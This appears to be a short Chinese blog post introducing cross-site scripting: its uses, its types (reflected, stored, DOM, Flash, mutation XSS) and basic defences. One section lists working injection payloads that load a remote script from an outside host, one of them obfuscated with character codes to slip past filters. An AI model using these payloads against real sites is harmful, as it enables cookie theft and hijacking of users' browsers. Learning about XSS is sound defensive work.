xss

Posted on 周五 27 二月 2015 in misc

xss是什么

跨站脚本攻击(Cross Site Scripting)，为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码，当用户浏览该页之时，嵌入其中Web里面的Script代码会被执行，从而达到恶意攻击用户的目的。

xss可以做什么

盗取cookie
挂马
XSS Worm
等

xss分类

反射性 xss
储存型 xss
- 提交的xss代码会储存在服务器
- 如留言板xss，xss代码储存到数据库，当有用户查看包含xss代码的浏览时代码就会被执行
- 储存型xss最隐蔽
DOM xss
- 不需要服务器解析，依靠浏览器端DOM解析
flash xss
- 利用flash文件缺陷执行js脚本，一般为反射性xss
mxss
- 又叫突变xss，主要用于绕过xss过滤

xss利用

    <script src='http://b.ioio.pub/xss/probe.js'></script>
    <img src=xonerror="s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js'";>
    <svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>
    <svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,
    101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,9
    7,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,
    99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,
    47,120,115,115,47,112,114,111,98,101,46,106,115)) >

xss防御

黑白名单过滤
在cookie加入httponly属性